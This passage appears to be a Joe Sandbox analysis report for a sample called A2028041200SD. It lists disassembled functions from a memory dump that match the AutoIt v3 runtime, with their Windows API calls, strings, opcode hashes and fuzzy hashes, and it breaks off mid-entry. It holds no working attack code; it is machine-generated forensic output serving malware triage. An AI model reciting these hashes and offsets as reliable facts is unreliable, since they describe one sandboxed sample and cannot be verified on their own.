                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: 48dfa9440b9cd545b1e8b56d76e8dbc428af95196846f9f342a0feb72d271333
                                                                        • Instruction ID: 27e0af9e636d93ec8a513ec09536d7037b0f44480364e60d6019e00d909cf3cc
                                                                        • Opcode Fuzzy Hash: 48dfa9440b9cd545b1e8b56d76e8dbc428af95196846f9f342a0feb72d271333
                                                                        • Instruction Fuzzy Hash: 12128D71A062019FDB11CF28C884BA9B7F9FF45308F144569F9A9DB6A2C731EC81DB91
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093DBD6
                                                                        • GetDriveTypeW.KERNEL32(?,0098DC54,?,\\.\,0098DC00), ref: 0093DCC3
                                                                        • SetErrorMode.KERNEL32(00000000,0098DC54,?,\\.\,0098DC00), ref: 0093DE29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: c20a826eb632c376ca7f389c829b9260d1ee1792e6f7e327d1b561c587bc80b2
                                                                        • Instruction ID: 1033505cf4687c76da454626bf7fd3e082b0967a2bce9c2369ad65d8767af28c
                                                                        • Opcode Fuzzy Hash: c20a826eb632c376ca7f389c829b9260d1ee1792e6f7e327d1b561c587bc80b2
                                                                        • Instruction Fuzzy Hash: C951D530209306ABC310EF24E8A2939B7A9FBD5708F209819F467D76D1DB70DA45DF92
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 4853ddbcd75c184d6de7f9c4d2948917de27df2e4aed1f6d90045e6ce3a86385
                                                                        • Instruction ID: f5b86b1207ea3884ad30161fa06828aed5a07899e966526cf41045a115a0e98b
                                                                        • Opcode Fuzzy Hash: 4853ddbcd75c184d6de7f9c4d2948917de27df2e4aed1f6d90045e6ce3a86385
                                                                        • Instruction Fuzzy Hash: 0281D33074020DBACB21BB74DD82FBE7768FF95304F048029FA05EA1C6EB61DA51C6A1
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0095C788
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0095C83E
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0095C859
                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0095CB15
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: e6793358670d36486af94fc7ad7920c63a6a1bc8ee6a37db27bced0547ddb171
                                                                        • Instruction ID: aa4ad731063f9549a4b77baa8733642c7f6ac248240ea50441543078ab6ab72c
                                                                        • Opcode Fuzzy Hash: e6793358670d36486af94fc7ad7920c63a6a1bc8ee6a37db27bced0547ddb171
                                                                        • Instruction Fuzzy Hash: 86F1E3B1509301AFD721CF25CC89BAABBE8FF49356F040A1DF989D62A1C774D848DB91
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,0098DC00), ref: 00956449
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 3964851224-45149045
                                                                        • Opcode ID: c332e02f6dfbb47e19cdda09c7ce80837ec0130a2c2e491e33cb215ddb16250c
                                                                        • Instruction ID: ccfad4dc7d500e3f68e0787e232f85c78af33ebc0625f227012e3c0bbbcbc13c
                                                                        • Opcode Fuzzy Hash: c332e02f6dfbb47e19cdda09c7ce80837ec0130a2c2e491e33cb215ddb16250c
                                                                        • Instruction Fuzzy Hash: D9C18A302043558FCA14EF15C551A7EB7E6AFD9345F40486CF8869B2E2EB25ED4ECB82
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0095D5AE
                                                                        • SetTextColor.GDI32(?,?), ref: 0095D5B2
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0095D5C8
                                                                        • GetSysColor.USER32(0000000F), ref: 0095D5D3
                                                                        • CreateSolidBrush.GDI32(?), ref: 0095D5D8
                                                                        • GetSysColor.USER32(00000011), ref: 0095D5F0
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095D5FE
                                                                        • SelectObject.GDI32(?,00000000), ref: 0095D60F
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0095D618
                                                                        • SelectObject.GDI32(?,?), ref: 0095D625
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0095D644
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095D65B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0095D670
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095D698
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0095D6BF
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0095D6DD
                                                                        • DrawFocusRect.USER32(?,?), ref: 0095D6E8
                                                                        • GetSysColor.USER32(00000011), ref: 0095D6F6
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0095D6FE
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0095D712
                                                                        • SelectObject.GDI32(?,0095D2A5), ref: 0095D729
                                                                        • DeleteObject.GDI32(?), ref: 0095D734
                                                                        • SelectObject.GDI32(?,?), ref: 0095D73A
                                                                        • DeleteObject.GDI32(?), ref: 0095D73F
                                                                        • SetTextColor.GDI32(?,?), ref: 0095D745
                                                                        • SetBkColor.GDI32(?,?), ref: 0095D74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 812f6dd2a65a162357bcb9b48f0ed987f292e1cfd1eb90db4f750b0de0873ad6
                                                                        • Instruction ID: 10f292a1f3e9a8cd7512480b1c1d4c9ceecc3cf492d87292f2b79d2adc2fbd20
                                                                        • Opcode Fuzzy Hash: 812f6dd2a65a162357bcb9b48f0ed987f292e1cfd1eb90db4f750b0de0873ad6
                                                                        • Instruction Fuzzy Hash: 28516C72906208AFDF10DFA4DC48EAE7B79EF08320F104511F919AB2A0D7719A81DF90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0095B7B0
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0095B7C1
                                                                        • CharNextW.USER32(0000014E), ref: 0095B7F0
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0095B831
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0095B847
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0095B858
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0095B875
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0095B8C7
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0095B8DD
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0095B90E
                                                                        • _memset.LIBCMT ref: 0095B933
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0095B97C
                                                                        • _memset.LIBCMT ref: 0095B9DB
                                                                        • SendMessageW.USER32 ref: 0095BA05
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0095BA5D
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0095BB0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0095BB2C
                                                                        • GetMenuItemInfoW.USER32(?), ref: 0095BB76
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0095BBA3
                                                                        • DrawMenuBar.USER32(?), ref: 0095BBB2
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0095BBDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 25ff9e877722f253506409bf7ad0a6285d190e33d531c75a3d4c53747c43e687
                                                                        • Instruction ID: 251d15595195498f89f1cd54dad37deabd7594ca9ec9af89c5d3b24a0e781934
                                                                        • Opcode Fuzzy Hash: 25ff9e877722f253506409bf7ad0a6285d190e33d531c75a3d4c53747c43e687
                                                                        • Instruction Fuzzy Hash: 5DE18D71900208AFDF20DF66CC84AEE7BB8EF45725F108156FE19AA190D7748A89DF60
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0095778A
                                                                        • GetDesktopWindow.USER32 ref: 0095779F
                                                                        • GetWindowRect.USER32(00000000), ref: 009577A6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00957808
                                                                        • DestroyWindow.USER32(?), ref: 00957834
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0095785D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095787B
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009578A1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 009578B6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009578C9
                                                                        • IsWindowVisible.USER32(?), ref: 009578E9
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00957904
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00957918
                                                                        • GetWindowRect.USER32(?,?), ref: 00957930
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00957956
                                                                        • GetMonitorInfoW.USER32 ref: 00957970
                                                                        • CopyRect.USER32(?,?), ref: 00957987
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 009579F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: faf88301123f3a88b763528eb7329602ee1e3811eeb3190974ab00e46cf7e21b
                                                                        • Instruction ID: 30772634d4332592392dd503215a8181c264becfd59d0d9d49ff572308b672f7
                                                                        • Opcode Fuzzy Hash: faf88301123f3a88b763528eb7329602ee1e3811eeb3190974ab00e46cf7e21b
                                                                        • Instruction Fuzzy Hash: 5CB1A271618301AFDB04DFA5D888B6AFBE5FF88311F00891DF9999B291D770E944CB92
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00936CFB
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00936D21
                                                                        • _wcscpy.LIBCMT ref: 00936D4F
                                                                        • _wcscmp.LIBCMT ref: 00936D5A
                                                                        • _wcscat.LIBCMT ref: 00936D70
                                                                        • _wcsstr.LIBCMT ref: 00936D7B
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00936D97
                                                                        • _wcscat.LIBCMT ref: 00936DE0
                                                                        • _wcscat.LIBCMT ref: 00936DE7
                                                                        • _wcsncpy.LIBCMT ref: 00936E12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: 3b1b9b99d5b69334c51d4bab3945f53606341b1e69f0ab111e9bf4974be22eb2
                                                                        • Instruction ID: d93b718b3b51a4db04f8d5dc132d63ddb9e5f1882835771a450a3a2b4828c504
                                                                        • Opcode Fuzzy Hash: 3b1b9b99d5b69334c51d4bab3945f53606341b1e69f0ab111e9bf4974be22eb2
                                                                        • Instruction Fuzzy Hash: 7241B172604208BBEB10AB64CC47FBF77BCEF81714F144025F905A61C2EBB59A519AA1
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0090A939
                                                                        • GetSystemMetrics.USER32(00000007), ref: 0090A941
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0090A96C
                                                                        • GetSystemMetrics.USER32(00000008), ref: 0090A974
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0090A999
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0090A9B6
                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0090A9C6
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0090A9F9
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0090AA0D
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0090AA2B
                                                                        • GetStockObject.GDI32(00000011), ref: 0090AA47
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0090AA52
                                                                          • Part of subcall function 0090B63C: GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                          • Part of subcall function 0090B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        • SetTimer.USER32(00000000,00000000,00000028,0090AB87), ref: 0090AA79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: ecb058facc55360391076c44a4c525a5542e5f9eeaef5d4f91803805af93f300
                                                                        • Instruction ID: d1ed6ee7bebf9ad687496cef2c4b0e2429ee6d72ddca47b2b177b1d9c78cb4dc
                                                                        • Opcode Fuzzy Hash: ecb058facc55360391076c44a4c525a5542e5f9eeaef5d4f91803805af93f300
                                                                        • Instruction Fuzzy Hash: 4DB18A71A1520ADFDB14DFA8CD45BAE7BB9FF48324F104229FA15A62D0DB34E840DB91
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 62970417-1919597938
                                                                        • Opcode ID: 774f90a157cd602e23ce9e924f47b74d2d28d4090049f96bdb5a309d6e1db5e2
                                                                        • Instruction ID: 36521ef20c01c82e15976e51f1e0f5b351ecd7ae31681e81fdeaab8c6efd43ca
                                                                        • Opcode Fuzzy Hash: 774f90a157cd602e23ce9e924f47b74d2d28d4090049f96bdb5a309d6e1db5e2
                                                                        • Instruction Fuzzy Hash: 15D1E730108746AFCB18EF24C441AAABBB4FF55344F104E1DF596976A1DB30E99ACBD2
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00953735
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0098DC00,00000000,?,00000000,?,?), ref: 009537A3
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009537EB
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00953874
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00953B94
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00953BA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 9f33295c967f30a0339044193a4f379df3006ec34cca0e6c95167d811553f4aa
                                                                        • Instruction ID: 891ab104441046d8736b7f9189bc9d0a88bfa629553869d2ac22cd6cbf297a03
                                                                        • Opcode Fuzzy Hash: 9f33295c967f30a0339044193a4f379df3006ec34cca0e6c95167d811553f4aa
                                                                        • Instruction Fuzzy Hash: AD026A752046059FCB14EF29C855E2AB7E9FF88720F04855CF98A9B3A1DB30ED45CB82
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00956C56
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00956D16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 4ac2c7ca17e32a4b251b47bee36ff6708a36f181e204113fdb15eb6b1e01a6db
                                                                        • Instruction ID: b1a1698d9cdadda2c96968db48d83ddd3c454cc1c39ad54693910b89d07a60fd
                                                                        • Opcode Fuzzy Hash: 4ac2c7ca17e32a4b251b47bee36ff6708a36f181e204113fdb15eb6b1e01a6db
                                                                        • Instruction Fuzzy Hash: E6A149302043559FCB14EF25C852A7AB3A6FF84315F504D6DB9969B2D2DB31EC19CB82
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092CF91
                                                                        • __swprintf.LIBCMT ref: 0092D032
                                                                        • _wcscmp.LIBCMT ref: 0092D045
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0092D09A
                                                                        • _wcscmp.LIBCMT ref: 0092D0D6
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0092D10D
